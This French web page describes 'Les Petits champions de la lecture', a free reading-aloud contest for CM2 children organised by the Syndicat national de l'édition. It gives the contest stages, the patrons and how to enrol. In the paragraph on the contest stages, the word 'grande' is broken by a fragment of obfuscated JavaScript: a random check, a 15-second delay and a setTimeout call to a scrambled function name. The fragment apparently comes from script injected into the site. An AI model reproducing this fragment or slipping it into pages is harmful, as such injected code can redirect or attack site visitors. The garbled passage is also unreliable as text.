Les petits champions de la lecture

L’association

L’association « Les Petits champions de la lecture », a été fondée au mois de juin 2012 à l’initiative du Syndicat national de l’édition. Elle est présidée par Antoine Gallimard. Son objet est la promotion des livres et de la lecture. Ses membres sont des représentants de toute la chaîne du livre : éditeurs, bibliothécaires, libraires, élus locaux en charge de la culture.

De quoi s’agit-il ?

Les enfants des classes de CM2 sont invités à lire en public un court texte de leur choix pendant 3 minutes maximum, extrait d’une œuvre de fiction. Ils peuvent participer

  • au sein de leur classe
  • au sein d’un groupe sous la responsabilité d’un médiateur du livre

Le jeu est organisé en quatre étapes : le meilleur lecteur d’un groupe participe à une seconde étape à l’échelle locale, puis à une demi-finale régionale sur Internet et, pour 10 chanceux, une grandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e finale nationale à la Comédie-Française. Dominique Blanc et Timothée de Fombelle sont la marraine et le parrain de cette quatrième édition.

Totalement gratuits et ouverts à tous les enfants scolarisés en CM2, Les Petits champions de la lecture  offrent un espace de lecture partagée à des milliers d’enfants de tous horizons, que la pratique de la lecture leur soit déjà régulière ou pas. Le message que porte ce jeu est simple : encourager la lecture chez les plus jeunes en rappelant qu’avant tout chose, lire est un plaisir, et parfois même un jeu !

Placé sous le haut patronage de la Ministre de l’Éducation nationale, présidé par Antoine Gallimard et parrainé par la comédienne Dominique Blanc, pensionnaire de la Comédie-Française et par l’écrivain Timothée de Fombelle, le jeu « Les Petits champions de la lecture » est une initiative du Syndicat national de l’édition.

Pour toutes questions, n’hésitez pas à nous contacter : contact@lespetitschampionsdelalecture.fr

C'est la rentrée pour les Petits champions !

Les inscriptions pour la 6e édition sont ouvertes, pour s'inscrire il faut cliquer là